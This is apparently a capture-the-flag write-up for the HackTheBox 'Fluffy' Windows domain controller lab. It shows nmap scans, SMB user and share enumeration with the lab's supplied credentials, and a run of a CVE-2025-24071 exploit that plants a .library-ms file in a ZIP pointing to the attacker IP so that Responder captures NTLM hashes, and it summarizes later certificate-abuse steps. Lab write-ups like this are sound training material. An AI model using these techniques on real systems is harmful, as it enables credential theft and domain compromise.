Post

Fluffy

Writeup for HackTheBox Fluffy machine

Fluffy

Executive Summary

Fluffy is a Windows AD DC involving client-side spoofing, group delegation abuse, and AD CS misconfigurations. The attack chain is as follows:

  • CVE-2025-24071 → Hash Capture — Enumerate writable IT SMB share with provided j.fleischman creds. Upload a malicious .library-ms file in a ZIP; when an admin agent parses it, capture NetNTLMv2 hash of p.agila and crack it offline.
  • Group Delegation + Shadow Credentials → User — With p.agila creds, use bloodyAD to join the Service Accounts group. Shadow Credentials on winrm_svc to retrieve its NT hash; access user flag via WinRM.
  • GenericWrite → ESC16 → DAca_svc has GenericWrite on ca_svc. Temporarily change its UPN to administrator, request a certificate from a standard template, then change the UPN back. Authenticate with the cert to retrieve Administrator’s NT hash; Pass-the-Hash to DA.

Reconnaissance

Network Scanning (Nmap)

We begin by defining the target IP address and performing a two-stage port scan using Nmap to identify open TCP ports and run detailed service banner detection and default script scans.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ IP=10.10.11.69  
                                                                                                                                                              
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ port=$(sudo nmap -p- $IP --min-rate 10000 | grep open | cut -d'/' -f1 | tr '\n' ',' )
[sudo] password for kali: 
                                                                                                                                                              
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ sudo nmap -sC -sV -vv -p $port $IP -oN fluffy.scan 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-25 07:25 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:25
Completed NSE at 07:25, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:25
Completed NSE at 07:25, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:25
Completed NSE at 07:25, 0.00s elapsed
Initiating Ping Scan at 07:25
Scanning 10.10.11.69 [4 ports]
Completed Ping Scan at 07:25, 0.35s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:25
Completed Parallel DNS resolution of 1 host. at 07:25, 0.00s elapsed
Initiating SYN Stealth Scan at 07:25
Scanning 10.10.11.69 [17 ports]
Discovered open port 53/tcp on 10.10.11.69
Discovered open port 139/tcp on 10.10.11.69
Discovered open port 445/tcp on 10.10.11.69
Discovered open port 464/tcp on 10.10.11.69
Discovered open port 636/tcp on 10.10.11.69
Discovered open port 49677/tcp on 10.10.11.69
Discovered open port 88/tcp on 10.10.11.69
Discovered open port 49666/tcp on 10.10.11.69
Discovered open port 593/tcp on 10.10.11.69
Discovered open port 49678/tcp on 10.10.11.69
Discovered open port 49681/tcp on 10.10.11.69
Discovered open port 5985/tcp on 10.10.11.69
Discovered open port 9389/tcp on 10.10.11.69
Discovered open port 49730/tcp on 10.10.11.69
Discovered open port 3269/tcp on 10.10.11.69
Discovered open port 49695/tcp on 10.10.11.69
Discovered open port 389/tcp on 10.10.11.69
Completed SYN Stealth Scan at 07:25, 0.71s elapsed (17 total ports)
Initiating Service scan at 07:25
Scanning 17 services on 10.10.11.69
Completed Service scan at 07:26, 59.64s elapsed (17 services on 1 host)
NSE: Script scanning 10.10.11.69.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:26
NSE Timing: About 99.96% done; ETC: 07:26 (0:00:00 remaining)
Completed NSE at 07:27, 40.12s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:27
Completed NSE at 07:27, 3.64s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:27
Completed NSE at 07:27, 0.00s elapsed
Nmap scan report for 10.10.11.69
Host is up, received echo-reply ttl 127 (0.34s latency).
Scanned at 2025-05-25 07:25:24 EDT for 104s

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-05-25 11:34:05Z)
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T11:35:49+00:00; +8m43s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after:  2026-04-17T16:04:17
| MD5:   2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
| -----BEGIN CERTIFICATE-----
| MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF
| ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGZmx1ZmZ5
| MRcwFQYDVQQDEw5mbHVmZnktREMwMS1DQTAeFw0yNTA0MTcxNjA0MTdaFw0yNjA0
| MTcxNjA0MTdaMBoxGDAWBgNVBAMTD0RDMDEuZmx1ZmZ5Lmh0YjCCASIwDQYJKoZI
| hvcNAQEBBQADggEPADCCAQoCggEBAOFkXHPh6Bv/Ejx+B3dfWbqtAmtOZY7gT6XO
| KD/ljfOwRrRuvKhf6b4Qam7mZ08lU7Z9etWUIGW27NNoK5qwMnXzw/sYDgGMNVn4
| bb/2kjQES+HFs0Hzd+s/BBcSSp1BnAgjbBDcW/SXelcyOeDmkDKTHS7gKR9zEvK3
| ozNNc9nFPj8GUYXYrEbImIrisUu83blL/1FERqAFbgGwKP5G/YtX8BgwO7iJIqoa
| 8bQHdMuugURvQptI+7YX7iwDFzMPo4sWfueINF49SZ9MwbOFVHHwSlclyvBiKGg8
| EmXJWD6q7H04xPcBdmDtbWQIGSsHiAj3EELcHbLh8cvk419RD5ECAwEAAaOCAzgw
| ggM0MC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABs
| AGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQD
| AgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQME
| AgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglg
| hkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFMlh3+130Pna
| 0Hgb9AX2e8Uhyr0FMB8GA1UdIwQYMBaAFLZo6VUJI0gwnx+vL8f7rAgMKn0RMIHI
| BgNVHR8EgcAwgb0wgbqggbeggbSGgbFsZGFwOi8vL0NOPWZsdWZmeS1EQzAxLUNB
| LENOPURDMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
212: | cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Zmx1ZmZ5LERDPWh0Yj9jZXJ0aWZp
213: | Y2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0
214: | aW9uUG9pbnQwgb8GCCsGAQUFBwEBBIGyMIGvMIGsBggrBgEFBQcwAoaBn2xkYXA6
215: | Ly8vQ049Zmx1ZmZ5LURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNl
216: | cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Zmx1ZmZ5LERD
217: | PWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlv
218: | bkF1dGhvcml0eTA7BgNVHREENDAyoB8GCSsGAQQBgjcZAaASBBB0co4Ym5z7RbSI
219: | 5tsj1jN/gg9EQzAxLmZsdWZmeS5odGIwTgYJKwYBBAGCNxkCBEEwP6A9BgorBgEE
220: | AYI3GQIBoC8ELVMtMS01LTIxLTQ5NzU1MDc2OC0yNzk3NzE2MjQ4LTI2MjcwNjQ1
221: | NzctMTAwMDANBgkqhkiG9w0BAQsFAAOCAQEAWjL2YkginWECPSm1EZyi8lPQisMm
222: | VNF2Ab2I8w/neK2EiXtN+3Z7W5xMZ20mC72lMaj8dLNN/xpJ9WIvQWrjXTO4NC2o
223: | 53OoRmAJdExwliBfAdKY0bc3GaKSLogT209lxqt+kO0fM2BpYnlP+N3R8mVEX2Fk
224: | 1WXCOK7M8oQrbaTPGtrDesMYrd7FQNTbZUCkunFRf85g/ZCAjshXrA3ERi32pEET
225: | eV9dUA0b1o+EkjChv+b1Eyt5unH3RDXpA9uvgpTJSFg1XZucmEbcdICBV6VshMJc
226: | 9r5Zuo/LdOGg/tqrZV8cNR/AusGMNslltUAYtK3HyjETE/REiQgwS9mBbQ==
227: |_-----END CERTIFICATE-----
228: 445/tcp   open  microsoft-ds? syn-ack ttl 127
229: 464/tcp   open  kpasswd5?     syn-ack ttl 127
230: 593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
231: 636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb., Site: Default-First-Site-Name)
232: |_ssl-date: 2025-05-25T11:35:49+00:00; +8m44s from scanner time.
233: | ssl-cert: Subject: commonName=DC01.fluffy.htb
234: | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
235: | Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
236: | Public Key type: rsa
237: | Public Key bits: 2048
238: | Signature Algorithm: sha256WithRSAEncryption
239: | Not valid before: 2025-04-17T16:04:17
240: | Not valid after:  2026-04-17T16:04:17
241: | MD5:   2765:a68f:4883:dc6d:0969:5d0d:3666:c880
242: | SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
243: | -----BEGIN CERTIFICATE-----
244: | MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF
245: | ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGZmx1ZmZ5
246: | MRcwFQYDVQQDEw5mbHVmZnktREMwMS1DQTAeFw0yNTA0MTcxNjA0MTdaFw0yNjA0
247: | MTcxNjA0MTdaMBoxGDAWBgNVBAMTD0RDMDEuZmx1ZmZ5Lmh0YjCCASIwDQYJKoZI
248: | hvcNAQEBBQADggEPADCCAQoCggEBAOFkXHPh6Bv/Ejx+B3dfWbqtAmtOZY7gT6XO
249: | KD/ljfOwRrRuvKhf6b4Qam7mZ08lU7Z9etWUIGW27NNoK5qwMnXzw/sYDgGMNVn4
250: | bb/2kjQES+HFs0Hzd+s/BBcSSp1BnAgjbBDcW/SXelcyOeDmkDKTHS7gKR9zEvK3
251: | ozNNc9nFPj8GUYXYrEbImIrisUu83blL/1FERqAFbgGwKP5G/YtX8BgwO7iJIqoa
252: | 8bQHdMuugURvQptI+7YX7iwDFzMPo4sWfueINF49SZ9MwbOFVHHwSlclyvBiKGg8
253: | EmXJWD6q7H04xPcBdmDtbWQIGSsHiAj3EELcHbLh8cvk419RD5ECAwEAAaOCAzgw
254: | ggM0MC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABs
255: | AGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQD
256: | AgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQME
257: | AgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglg
258: | hkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFMlh3+130Pna
259: | 0Hgb9AX2e8Uhyr0FMB8GA1UdIwQYMBaAFLZo6VUJI0gwnx+vL8f7rAgMKn0RMIHI
260: | BgNVHR8EgcAwgb0wgbqggbeggbSGgbFsZGFwOi8vL0NOPWZsdWZmeS1EQzAxLUNB
261: | LENOPURDMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
262: | cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Zmx1ZmZ5LERDPWh0Yj9jZXJ0aWZp
263: | Y2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0
264: | aW9uUG9pbnQwgb8GCCsGAQUFBwEBBIGyMIGvMIGsBggrBgEFBQcwAoaBn2xkYXA6
265: | Ly8vQ049Zmx1ZmZ5LURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNl
266: | cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Zmx1ZmZ5LERD
267: | PWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlv
268: | bkF1dGhvcml0eTA7BgNVHREENDAyoB8GCSsGAQQBgjcZAaASBBB0co4Ym5z7RbSI
269: | 5tsj1jN/gg9EQzAxLmZsdWZmeS5odGIwTgYJKwYBBAGCNxkCBEEwP6A9BgorBgEE
270: | AYI3GQIBoC8ELVMtMS01LTIxLTQ5NzU1MDc2OC0yNzk3NzE2MjQ4LTI2MjcwNjQ1
271: | NzctMTAwMDANBgkqhkiG9w0BAQsFAAOCAQEAWjL2YkginWECPSm1EZyi8lPQisMm
272: | VNF2Ab2I8w/neK2EiXtN+3Z7W5xMZ20mC72lMaj8dLNN/xpJ9WIvQWrjXTO4NC2o
273: | 53OoRmAJdExwliBfAdKY0bc3GaKSLogT209lxqt+kO0fM2BpYnlP+N3R8mVEX2Fk
274: | 1WXCOK7M8oQrbaTPGtrDesMYrd7FQNTbZUCkunFRf85g/ZCAjshXrA3ERi32pEET
275: | eV9dUA0b1o+EkjChv+b1Eyt5unH3RDXpA9uvgpTJSFg1XZucmEbcdICBV6VshMJc
276: | 9r5Zuo/LdOGg/tqrZV8cNR/AusGMNslltUAYtK3HyjETE/REiQgwS9mBbQ==
277: |_-----END CERTIFICATE-----
278: 3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb., Site: Default-First-Site-Name)
279: |_ssl-date: 2025-05-25T11:35:49+00:00; +8m44s from scanner time.
280: | ssl-cert: Subject: commonName=DC01.fluffy.htb
281: | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
282: | Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
283: | Public Key type: rsa
284: | Public Key bits: 2048
285: | Signature Algorithm: sha256WithRSAEncryption
286: | Not valid before: 2025-04-17T16:04:17
287: | Not valid after:  2026-04-17T16:04:17
288: | MD5:   2765:a68f:4883:dc6d:0969:5d0d:3666:c880
289: | SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
290: | -----BEGIN CERTIFICATE-----
291: | MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF
292: | ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGZmx1ZmZ5
293: | MRcwFQYDVQQDEw5mbHVmZnktREMwMS1DQTAeFw0yNTA0MTcxNjA0MTdaFw0yNjA0
294: | MTcxNjA0MTdaMBoxGDAWBgNVBAMTD0RDMDEuZmx1ZmZ5Lmh0YjCCASIwDQYJKoZI
295: | hvcNAQEBBQADggEPADCCAQoCggEBAOFkXHPh6Bv/Ejx+B3dfWbqtAmtOZY7gT6XO
296: | KD/ljfOwRrRuvKhf6b4Qam7mZ08lU7Z9etWUIGW27NNoK5qwMnXzw/sYDgGMNVn4
297: | bb/2kjQES+HFs0Hzd+s/BBcSSp1BnAgjbBDcW/SXelcyOeDmkDKTHS7gKR9zEvK3
298: | ozNNc9nFPj8GUYXYrEbImIrisUu83blL/1FERqAFbgGwKP5G/YtX8BgwO7iJIqoa
299: | 8bQHdMuugURvQptI+7YX7iwDFzMPo4sWfueINF49SZ9MwbOFVHHwSlclyvBiKGg8
300: | EmXJWD6q7H04xPcBdmDtbWQIGSsHiAj3EELcHbLh8cvk419RD5ECAwEAAaOCAzgw
301: | ggM0MC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABs
302: | AGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQD
303: | AgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQME
304: | AgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglg
305: | hkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFMlh3+130Pna
306: | 0Hgb9AX2e8Uhyr0FMB8GA1UdIwQYMBaAFLZo6VUJI0gwnx+vL8f7rAgMKn0RMIHI
307: | BgNVHR8EgcAwgb0wgbqggbeggbSGgbFsZGFwOi8vL0NOPWZsdWZmeS1EQzAxLUNB
308: | LENOPURDMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
309: | cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Zmx1ZmZ5LERDPWh0Yj9jZXJ0aWZp
310: | Y2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0
311: | aW9uUG9pbnQwgb8GCCsGAQUFBwEBBIGyMIGvMIGsBggrBgEFBQcwAoaBn2xkYXA6
312: | Ly8vQ049Zmx1ZmZ5LURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNl
313: | cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Zmx1ZmZ5LERD
314: | PWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlv
315: | bkF1dGhvcml0eTA7BgNVHREENDAyoB8GCSsGAQQBgjcZAaASBBB0co4Ym5z7RbSI
316: | 5tsj1jN/gg9EQzAxLmZsdWZmeS5odGIwTgYJKwYBBAGCNxkCBEEwP6A9BgorBgEE
317: | AYI3GQIBoC8ELVMtMS01LTIxLTQ5NzU1MDc2OC0yNzk3NzE2MjQ4LTI2MjcwNjQ1
318: | NzctMTAwMDANBgkqhkiG9w0BAQsFAAOCAQEAWjL2YkginWECPSm1EZyi8lPQisMm
319: | VNF2Ab2I8w/neK2EiXtN+3Z7W5xMZ20mC72lMaj8dLNN/xpJ9WIvQWrjXTO4NC2o
320: | 53OoRmAJdExwliBfAdKY0bc3GaKSLogT209lxqt+kO0fM2BpYnlP+N3R8mVEX2Fk
321: | 1WXCOK7M8oQrbaTPGtrDesMYrd7FQNTbZUCkunFRf85g/ZCAjshXrA3ERi32pEET
322: | eV9dUA0b1o+EkjChv+b1Eyt5unH3RDXpA9uvgpTJSFg1XZucmEbcdICBV6VshMJc
323: | 9r5Zuo/LdOGg/tqrZV8cNR/AusGMNslltUAYtK3HyjETE/REiQgwS9mBbQ==
324: |_-----END CERTIFICATE-----
325: 5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
326: |_http-title: Not Found
327: |_http-server-header: Microsoft-HTTPAPI/2.0
328: 9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
329: 49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
330: 49677/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
331: 49678/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
332: 49681/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
333: 49695/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
334: 49730/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
335: Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-05-25T11:35:05
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 53865/tcp): CLEAN (Timeout)
|   Check 2 (port 19123/tcp): CLEAN (Timeout)
|   Check 3 (port 5751/udp): CLEAN (Timeout)
|   Check 4 (port 54887/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 8m42s, deviation: 2s, median: 8m42s

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:27
Completed NSE at 07:27, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:27
Completed NSE at 07:27, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:27
Completed NSE at 07:27, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.05 seconds
           Raw packets sent: 21 (900B) | Rcvd: 18 (776B)

Initial Access & SMB Enumeration

Active Directory User Enumeration

We validate the provided credentials for j.fleischman and enumerate domain users using netexec over SMB:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ netexec smb $IP -u  'j.fleischman' -p J0elTHEM4n1990! --users

SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
SMB         10.10.11.69     445    DC01             -Username-                    -Last PW Set-       -BadPW- -Description-                                  
SMB         10.10.11.69     445    DC01             Administrator                 2025-04-17 15:45:01 0       Built-in account for administering the computer/domain
SMB         10.10.11.69     445    DC01             Guest                         <never>             0       Built-in account for guest access to the computer/domain
SMB         10.10.11.69     445    DC01             krbtgt                        2025-04-17 16:00:02 0       Key Distribution Center Service Account 
SMB         10.10.11.69     445    DC01             ca_svc                        2025-04-17 16:07:50 0        
SMB         10.10.11.69     445    DC01             ldap_svc                      2025-04-17 16:17:00 0        
SMB         10.10.11.69     445    DC01             p.agila                       2025-04-18 14:37:08 0        
SMB         10.10.11.69     445    DC01             winrm_svc                     2025-05-18 00:51:16 0        
SMB         10.10.11.69     445    DC01             j.coffey                      2025-04-19 12:09:55 0        
SMB         10.10.11.69     445    DC01             j.fleischman                  2025-05-16 14:46:55 0        
SMB         10.10.11.69     445    DC01             [*] Enumerated 9 local users: FLUFFY
                                                                                               

We generate a username list for brute force or mapping targets:

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ netexec smb $IP -u  'j.fleischman' -p J0elTHEM4n1990! --users |  awk '/^SMB/ && $5 ~ /^[a-zA-Z0-9_.]+$/ { print $5 }' | tee -a username.txt  


Administrator
Guest
krbtgt
ca_svc
ldap_svc
p.agila
winrm_svc
j.coffey
j.fleischman

Share Enumeration

We list SMB shares with netexec to locate accessible data directories.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ netexec smb $IP -u  'j.fleischman' -p J0elTHEM4n1990! --shares

SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)                                                                                                                                         
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
SMB         10.10.11.69     445    DC01             [*] Enumerated shares
SMB         10.10.11.69     445    DC01             Share           Permissions     Remark
SMB         10.10.11.69     445    DC01             -----           -----------     ------
SMB         10.10.11.69     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.69     445    DC01             C$                              Default share
SMB         10.10.11.69     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.69     445    DC01             IT              READ,WRITE      
SMB         10.10.11.69     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.69     445    DC01             SYSVOL          READ            Logon server share 
                                                                                                       

We have both READ and WRITE access to the IT share.

Examining Shared Loot

We connect to the IT share using smbclient and retrieve the files within it. We identify Upgrade_Notice.pdf and download it for investigation.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ smbclient //$IP/IT -U fluffy.htb/j.fleischman%J0elTHEM4n1990! 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun May 25 07:41:00 2025
  ..                                  D        0  Sun May 25 07:41:00 2025
  Everything-1.4.1.1026.x64           D        0  Fri Apr 18 11:08:44 2025
  Everything-1.4.1.1026.x64.zip       A  1827464  Fri Apr 18 11:04:05 2025
  KeePass-2.58                        D        0  Fri Apr 18 11:08:38 2025
  KeePass-2.58.zip                    A  3225346  Fri Apr 18 11:03:17 2025
  Upgrade_Notice.pdf                  A   169963  Sat May 17 10:31:07 2025

                5842943 blocks of size 4096. 2069734 blocks available
smb: \> get Upgrade_Notice.pdf
getting file \Upgrade_Notice.pdf of size 169963 as Upgrade_Notice.pdf (17.1 KiloBytes/sec) (average 17.1 KiloBytes/sec)
smb: \> 

The document details an upgrade notice and highlights file-handling spoofing vulnerabilities:

Error Loading Image

Exploiting CVE-2025-24071 (Forced SMB Authentication Hash Leak)

Vulnerability Mechanism

CVE-2025-24071 is a spoofing vulnerability in Windows File Explorer that allows an attacker to leak user NTLM authentication hashes. The vulnerability centers on .library-ms files (Windows Library Description files) containing reference schemas pointing to remote locations. When a user views a folder containing a crafted .library-ms file, or extracts it from a compressed archive, Windows Explorer attempts to parse the metadata properties and query the remote URL schema automatically. By pointing the target schema to a remote UNC path (e.g., \\attacker_ip\share), Windows Explorer automatically initiates an SMB connection, transmitting the current user’s NetNTLMv2 authentication exchange hash to the attacker-controlled IP.

Exploitation Setup

We generate a malicious .library-ms file packaged within a ZIP archive (exploit.zip) pointing back to our local machine’s IP (10.10.14.33).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(kali㉿kali)-[~/HTB-machine/fluffy/CVE-2025-24071]
└─$ python3 exploit.py -i 10.10.14.33 -f shell   

          ______ ____    ____  _______       ___     ___    ___    _____        ___    _  _      ___    ______   __                              
         /      |\   \  /   / |   ____|     |__ \   / _ \  |__ \  | ____|      |__ \  | || |    / _ \  |____  | /_ |                             
        |  ,----' \   \/   /  |  |__    ______ ) | | | | |    ) | | |__    ______ ) | | || |_  | | | |     / /   | |                             
        |  |       \      /   |   __|  |______/ /  | | | |   / /  |___ \  |______/ /  |__   _| | | | |    / /    | |                             
        |  `----.   \    /    |  |____       / /_  | |_| |  / /_   ___) |       / /_     | |   | |_| |   / /     | |                             
         \______|    \__/     |_______|     |____|  \___/  |____| |____/       |____|    |_|    \___/   /_/      |_|                             
                                                                                                                                                  
                                                                                                                                                  
                                                Windows File Explorer Spoofing Vulnerability (CVE-2025-24071)                                    
                    by ThemeHackers                                                                                                                                                                                                                                                               
                                                                                                                                                  
Creating exploit with filename: shell.library-ms
Target IP: 10.10.14.33

Generating library file...
✓ Library file created successfully

Creating ZIP archive...
✓ ZIP file created successfully

Cleaning up temporary files...
✓ Cleanup completed

Process completed successfully!
Output file: exploit.zip
Run this file on the victim machine and you will see the effects of the vulnerability such as using ftp smb to send files etc.
                                                                 

Capturing and Cracking the NetNTLMv2 Hash

We start Responder to listen on the local tunnel interface (tun0) and capture inbound LLMNR, NBT-NS, and SMB requests.

1
2
┌──(kali㉿kali)-[~/HTB-machine/fluffy]
└─$ sudo responder -I tun0 -v

We upload the crafted payload archive to the writable IT SMB share:

1
2
3
4
